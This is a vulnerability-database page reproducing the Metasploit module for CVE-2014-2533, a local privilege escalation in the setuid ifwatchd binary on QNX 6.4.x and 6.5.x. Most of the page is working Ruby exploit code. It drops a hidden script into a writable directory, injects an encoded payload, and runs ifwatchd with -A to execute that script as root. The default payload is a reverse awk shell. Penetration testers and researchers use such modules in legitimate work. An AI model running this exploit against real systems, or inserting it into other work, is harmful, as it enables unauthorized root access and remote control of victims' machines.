Lucene search
K

ifwatchd Privilege Escalation

🗓️ 22 Mar 2018 20:09:03Reported by cenobyte, Tim Brown, bcoles <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 50 Views

ifwatchd Privilege Escalation module for QNX 6.4.x and 6.5.x systems, allowing arbitrary command execution as roo

Related
Code
ReporterTitlePublishedViews
Family
0day.today
ifwatchd Privilege Escalation Exploit
9 Oct 201800:00
zdt
Circl
CVE-2014-2533
10 Mar 201400:00
circl
CVE
CVE-2014-2533
18 Mar 201401:00
cve
Cvelist
CVE-2014-2533
18 Mar 201401:00
cvelist
Exploit DB
ifwatchd - Privilege Escalation (Metasploit)
9 Oct 201800:00
exploitdb
NVD
CVE-2014-2533
18 Mar 201405:18
nvd
Packet Storm
ifwatchd Privilege Escalation
8 Oct 201800:00
packetstorm
Prion
Command injection
18 Mar 201405:18
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::File
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ifwatchd Privilege Escalation',
        'Description' => %q{
          This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
          systems by exploiting the ifwatchd suid executable.

          ifwatchd allows users to specify scripts to execute using the '-A'
          command line argument; however, it does not drop privileges when
          executing user-supplied scripts, resulting in execution of arbitrary
          commands as root.

          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
          and 6.5.0 SP1 (x86).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'cenobyte', # Discovery and exploit
          'Tim Brown', # Independent discovery
          'bcoles' # Metasploit
        ],
        'References' => [
          ['CVE', '2014-2533'],
          ['BID', '66449'],
          ['EDB', '32153'],
          ['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
        ],
        'DisclosureDate' => '2014-03-10',
        'Platform' => 'unix', # QNX
        'Arch' => ARCH_CMD,
        'SessionTypes' => %w[shell meterpreter],
        'Targets' => [['Automatic', {}]],
        'Privileged' => true,
        'Payload' => {
          'BadChars' => '',
          'DisableNops' => true,
          'Space' => 1024,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'gawk generic'
          }
        },
        'DefaultOptions' => {
          'WfsDelay' => 10,
          'PAYLOAD' => 'cmd/unix/reverse_awk'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )
    register_advanced_options([
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ])
  end

  def ifwatchd_path
    '/sbin/ifwatchd'
  end

  def base_dir
    datastore['WritableDir']
  end

  def check
    return CheckCode::Safe("#{ifwatchd_path} is not setuid") unless setuid?(ifwatchd_path)

    CheckCode::Detected("#{ifwatchd_path} is setuid")
  end

  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    fail_with(Failure::BadConfig, "#{base_dir} is not writable") unless writable?(base_dir)

    script_path = "#{base_dir}/.#{rand_text_alphanumeric(10..15)}"

    print_status('Writing interface arrival event script...')

    cmd_exec "echo '#!/bin/sh' > #{script_path}"
    cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"
    cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"
    exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
    cmd_exec "echo \"#{exp}\" >> #{script_path}"
    cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
    register_file_for_cleanup(script_path)

    cmd_exec("chmod +x '#{script_path}'")

    print_status("Executing #{ifwatchd_path}...")
    interface = 'lo0'
    cmd_exec("#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo ")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Feb 2023 07:17Current
8High risk
Vulners AI Score8
CVSS 27.2
EPSS0.02906
50